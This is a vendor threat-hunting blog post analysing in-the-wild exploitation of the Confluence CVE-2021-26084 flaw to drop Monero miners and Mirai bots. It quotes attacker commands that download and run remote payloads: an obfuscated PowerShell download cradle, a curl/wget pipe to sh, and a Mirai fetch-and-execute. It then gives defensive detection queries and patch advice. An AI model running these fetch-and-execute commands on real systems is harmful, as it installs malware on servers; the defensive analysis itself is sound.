* [Blog](https://www.paloaltonetworks.com/blog) * [Security Operations](https://www.paloaltonetworks.com/blog/security-operations/) * [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/) * Hunting Confluence Atlass... # Hunting Confluence Atlassian RCE (CVE-2021-26084) by the Cortex XDR Managed Threat Hunting Experts [](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fhunting-confluence-atlassian-rce-cve-2021-26084-by-the-cortex-xdr-managed-threat-hunting-experts%2F) [](https://twitter.com/share?text=Hunting+Confluence+Atlassian+RCE+%28CVE-2021-26084%29+by+the+Cortex+XDR+Managed+Threat+Hunting+Experts&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fhunting-confluence-atlassian-rce-cve-2021-26084-by-the-cortex-xdr-managed-threat-hunting-experts%2F) [](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fhunting-confluence-atlassian-rce-cve-2021-26084-by-the-cortex-xdr-managed-threat-hunting-experts%2F&title=Hunting+Confluence+Atlassian+RCE+%28CVE-2021-26084%29+by+the+Cortex+XDR+Managed+Threat+Hunting+Experts&summary=&source=) [](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www.paloaltonetworks.com/blog/security-operations/hunting-confluence-atlassian-rce-cve-2021-26084-by-the-cortex-xdr-managed-threat-hunting-experts/&ts=markdown) \[\](mailto:?subject=Hunting Confluence Atlassian RCE (CVE-2021-26084) by the Cortex XDR Managed Threat Hunting Experts) Link copied By [Oded Awaskar](https://www.paloaltonetworks.com/blog/author/oded-awaskar/?ts=markdown "Posts by Oded Awaskar") Sep 14, 2021 7 minutes [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown) [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown) [Atlassian](https://www.paloaltonetworks.com/blog/tag/atlassian/?ts=markdown) [CVE-2021-26084](https://www.paloaltonetworks.com/blog/tag/cve-2021-26084/?ts=markdown) [managed threat hunting](https://www.paloaltonetworks.com/blog/tag/managed-threat-hunting/?ts=markdown) [MTH](https://www.paloaltonetworks.com/blog/tag/mth/?ts=markdown) [Threat Hunting](https://www.paloaltonetworks.com/blog/tag/threat-hunting/?ts=markdown) ### Overview On Aug. 25, 2021, Atlassian released a security advisory for an injection vulnerability in Confluence Server and Data Center, [CVE-2021-26084](https://unit42.paloaltonetworks.com/cve-2021-26084/). If the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems. Since the release of this advisory, mass scanning activity has started to occur, seeking unpatched systems, and in-the-wild exploitation has begun. In this post we will deep dive into the payloads used by one of the threat actors in an exploitation attempt, and demonstrate how blue teams can hunt for suspicious activities that may hint the network was affected by CVE-2021-26084 both on Windows/Linux based installations. **Initial Entry Point - Windows** In early September, the Cortex XDR Managed Threat Hunting experts noticed a suspicious process execution chain originated by "tomcat9.exe" Apache Tomcat provides a "pure Java" HTTP web server environment in which Java code can run, and is the only application server that is supported by Atlassian Confluence since 2015. ![Image #1: Suspicious execution chain leading to cmd.exe-\> powershell.exe](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-34.png) *Image #1: Suspicious execution chain leading to cmd.exe-\> powershell.exe* After further inspection of the cmd.exe and powershell.exe executions, these are the commands attempted to be executed by the attacker: Reconnaissance Commands: 1. hostname 2. cmd.exe /c ifconfig 3. cmd.exe /c ping Second Stage Payload Deployment Attempt: 1. cmd.exe /c "PoWershElL.exE -eXEc bypASS -noP -WInD HIdDEN -C IeX (NeW-OBjeCt Net.WeBClIeNt).DowNlOAdStRinG(\'http://178.238.226\[.\]127:58321/ev\[.\]H\')" As can be seen the second stage payload is attempting to download the a file called ev.h (Sha256:f6090724c500095a3105a3792d043a5b5cb94c02ee626c062d17620ffc077c7a) of a remote host 178.238.226\[.\]127. The Cortex XDR Managed Threat Hunters experts pursued downloading the file and carefully inspecting it. The file weighs ~530KB and uses a fairly unique obfuscation technique as seen in image #2 below: ![Image #2: Thousands of commented out lines](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-35.png) *Image #2: Thousands of commented out lines* The script contains thousands of commented-out lines, which is supposed to act as a padding and limiting security research capabilities in analyzing the actual running script. To overcome this, we used a regex to remove all lines starting with a "#", and we were left with the script shown below in image #3: ![Image #3: De-obfuscated script](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-36.png) *Image #3: De-obfuscated script* The script acts as another downloader stage, and proceeds to download the following resources: 1. http://178.238.226\[.\]127:58321/WinRing0x64.sys (Sha256:38d18778a600171e395e0dd0d8408b213530fbd4ba9317b8ac513e397fdd38a6) 2. http://178.238.226\[.\]127:58321/config.json 3. http://178.238.226\[.\]127:58321/xmrig.exe (Sha256:c0dabbd4d21e0a04d1c649cbc40b93d5b962d363bdec1018d17a251fb34d4183) The files are saved to the temp directory as set in the system's environment variables, followed by execution of the xmr.exe file. The Cortex XDR Managed Threat Hunters experts pursued downloading the files and carefully analyzing them. **WinRing0x64.sys (Sha256:38d18778a600171e395e0dd0d8408b213530fbd4ba9317b8ac513e397fdd38a6)** The WinRin0x64.sys driver is a legitimate signed driver, This file is utilized by the [XMRig miner](https://unit42.paloaltonetworks.com/unit42-large-scale-monero-cryptocurrency-mining-operation-using-xmrig/) - a high performance, open source, cross platform RandomX, KawPow, CryptoNight and AstroBWT unified CPU/GPU miner and RandomX benchmark. **config.json** The config.json is a configuration file which holds all relevant information for the Monero miner to perform its activities, information like mining pool, threat actor wallet and mining protocol can be found here. **xmrig.exe (Sha256:c0dabbd4d21e0a04d1c649cbc40b93d5b962d363bdec1018d17a251fb34d4183)** The xmrig.exe file is the main executable for Monero mining. To summarize this activity, the actor attempts exploiting the CVE-2021-26084 to deploy Monero miners on affected servers. **Initial Entry Point - Linux** A similar entry point was spotted when the Cortex XDR Managed Threat Hunting experts spotted an attacker attempting to execute Linux binaries on another windows host mistakenly identifying it as a Linux server. ![Image #4 - Mirai Botnet executable download attempt](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-37.png) *Image #4 - Mirai Botnet executable download attempt* After further inspection of the cmd.exe executions, these are the commands attempted to be executed by the attacker: Reconnaissance Commands: 1. ifconfig -all 2. netstat -ano Second Stage Payload Deployment Attempts: 1. curl http://35.223.63\[.\]59/docs/.jpg || wget -q -O- http://35.223.63\[.\]59/docs/.jpg) | sh 2. cd /tmp; curl http://185.142.236\[.\]33/mirai.x86 --output mirai.x86; chmod 777 mirai.x86; ./mirai.x86 tomcat As can be seen the second stage payloads are attempting to download the a files called: 1. .jpg (Sha256:8ee3d825859ead1500a338cfd65e6fdf4aff3f0b278e55d478bff6f8385d2ac4) of remote host 35.223.63\[.\]59. 2. mirai.x86(Sha256:8e636934ec318543941803ce52e07c48a632eb57e433e3c44f35330fa9c0f0f0) of remote host 185.142.236\[.\]33 The Cortex XDR Managed Threat Hunters experts pursued downloading the files and carefully analyzing them. **.jpg (Sha256:8ee3d825859ead1500a338cfd65e6fdf4aff3f0b278e55d478bff6f8385d2ac4)** The above file was pulled and was determined to be a malicious bash script as can be seen in Image #5: ![Image #5: Malicious bash script](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-38.png) *Image #5: Malicious bash script* The bash script is another stager with the end goal of deploying a Monero Miner on the affected server. Resources which will be downloaded by the bash script: 1. http://35.223.63\[.\]59/docs/configkkk.json (Sha256:79b954db3f76ae144787e1217ad6f442b545f9ee83d5587019e68b42139333ea) 2. http://35.223.63\[.\]59/docs/javae (Sha256:b6a373f8042d7d5d083bff16838372fd0b68c217dbb19596641521954f632c38) 3. http://35.223.63\[.\]59/docs/javae.sh (Sha256:ec4a3a15d001859f524bfe365377dcf54f64837f6e277b4f29c9f967756a2297) All of the above mentioned files were pulled and are determined to be dropping a Monero Miner on the affected servers. **Mirai.x86 (Sha256:8e636934ec318543941803ce52e07c48a632eb57e433e3c44f35330fa9c0f0f0)** This file was analyzed and determined to be a Mirai executable, Mirai is a malware that turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale network attacks. ### **Hunting for CVE-2021-26084 in Your Network** The Cortex XDR Managed Threat Hunting experts created a few queries which can enable defenders to determine if the network was affected by the CVE-2021-26084 vulnerability. **1. Detect all Atlassian Confluence Windows/Linux servers in the network** | config case\_sensitive = false timeframe=30d | dataset = xdr\_data //Targets both Linux/Windows installations. | filter (actor\_process\_image\_name contains "tomcat" and actor\_process\_image\_path contains "Atlassian") or (actor\_process\_image\_path contains "confluence" and actor\_process\_image\_name contains "java" ) | fields event\_timestamp, action\_file\_path, event\_type, event\_sub\_type, actor\_process\_image\_name, actor\_remote\_ip, agent\_hostname, agent\_id, actor\_process\_image\_path | alter note = "Atlassian Confluence observed on this host in the past 30 days" | comp count(event\_timestamp) as event\_count by agent\_hostname, note, actor\_process\_image\_path | |-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| A screenshot of an example output is shown below: ![A screenshot of an example output is shown below:](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-39.png) **2. Sort all process executions by the confluence server in ascending order, meaning the top executions are going to be the rarest.** | config case sensitive = false timeframe=14d | dataset = xdr data //Targets both Linux/Windows installations. | filter (actor\_process\_image\_name contains "tomcat" and actor\_process\_image\_path contains "Atlassian") or (actor\_process\_image\_path contains "confluence" and actor\_process\_image\_name contains "java" ) | fields event\_timestamp,action\_process\_image\_name , action\_process\_image\_command\_line , actor\_process\_image\_name, actor\_remote\_ip, agent\_hostname, agent\_id, actor\_process\_image\_path | comp count(event\_timestamp) as event\_count by agent\_hostname, action\_process\_image\_command\_line | sort asc event\_count | |----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| A screenshot of an example output is shown below: ![A screenshot of an example output is shown below:](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/09/word-image-40.png) Highlighting the rarest executions should enable defenders to spot suspicious commands which were executed by the Atlassian Confluence executables on both Windows/Linux systems. ### **Mitigation** We recommend that customers update Atlassian Confluence Server and Data Center to the latest version, 7.13.0 (TLS). You can find the newest release on [Atlassian's download center](https://www.atlassian.com/software/confluence/download-archives). If you cannot install the latest upgrade, see the Mitigation section on the Atlassian security advisory for information on how to mitigate this vulnerability by running a script for the operating system your Confluence server is hosted on. ### Conclusion Palo Alto Networks provides protection against the exploitation of this vulnerability: [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown) with a [Threat Prevention](https://www.paloaltonetworks.com/products/secure-the-network/subscriptions/threat-prevention?ts=markdown) security subscription (running Applications and Threat content update version 8453) can automatically block sessions related to this vulnerability using Threat ID 91594. *** ** * ** *** ## Related Blogs ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### Hunt and Investigate Removable Drive Threats with Cortex XDR](https://www.paloaltonetworks.com/blog/security-operations/hunt-and-investigate-removable-drive-threats-with-cortex-xdr/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown), [Unit 42](https://www.paloaltonetworks.com/blog/category/unit42/?ts=markdown), [Web Security](https://www.paloaltonetworks.com/blog/category/web-security/?ts=markdown) [#### Unit 42 Strikes Oil in MITRE Engenuity Managed Services Evaluation](https://www.paloaltonetworks.com/blog/2022/11/unit-42-mitre-managedservices-2022/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown) [#### Hunting PrintNightmare (CVE-2021-1675) Using Cortex XDR](https://www.paloaltonetworks.com/blog/security-operations/hunting-printnightmare/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown) [#### Threat Hunting with Mark of The Web Using Cortex XDR](https://www.paloaltonetworks.com/blog/security-operations/threat-hunting-with-mark-of-the-web-using-cortex-xdr/) ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [Uncategorized](https://www.paloaltonetworks.com/blog/category/uncategorized/?ts=markdown) [#### Exploring the Art and Science of Threat Hunting with Oded Awaskar](https://www.paloaltonetworks.com/blog/security-operations/exploring-the-art-and-science-of-threat-hunting-with-oded-awaskar/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown) [#### Forrester Names Palo Alto Networks a Leader in XDR](https://www.paloaltonetworks.com/blog/2024/06/forrester-names-palo-alto-networks-a-leader-in-xdr/) ### Subscribe to Security Operations Blogs! Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more. ![spinner](https://www.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up Please enter a valid email. By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder. This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply. {#footer} {#footer} ## Products and Services * [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown) * [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown) * [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown) * [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown) * [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown) * [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown) * [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown) * [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown) * [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown) * [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown) * [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown) * [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown) * [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown) * [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown) * [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown) * [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown) * [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown) * [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown) * [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown) * [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown) * [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown) * [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown) * [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown) * [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown) * [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown) * [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown) * [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown) * [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown) * [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown) * [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown) * [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown) * [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown) * [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown) * [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown) * [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown) * [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown) * [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown) * [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown) * [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown) ## Company * [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown) * [Careers](https://jobs.paloaltonetworks.com/en/) * [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown) * [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown) * [Customers](https://www.paloaltonetworks.com/customers?ts=markdown) * [Investor Relations](https://investors.paloaltonetworks.com/) * [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown) * [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown) ## Popular Links * [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown) * [Communities](https://www.paloaltonetworks.com/communities?ts=markdown) * [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown) * [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown) * [Event Center](https://events.paloaltonetworks.com/) * [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center) * [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown) * [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown) * [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown) * [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown) * [Tech Docs](https://docs.paloaltonetworks.com/) * [Unit 42](https://unit42.paloaltonetworks.com/) * [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd) ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg) * [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown) * [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown) * [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) * [Documents](https://www.paloaltonetworks.com/legal?ts=markdown) Copyright © 2026 Palo Alto Networks. All Rights Reserved * [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks) * [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown) * [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/) * [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks) * [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks) * EN Select your language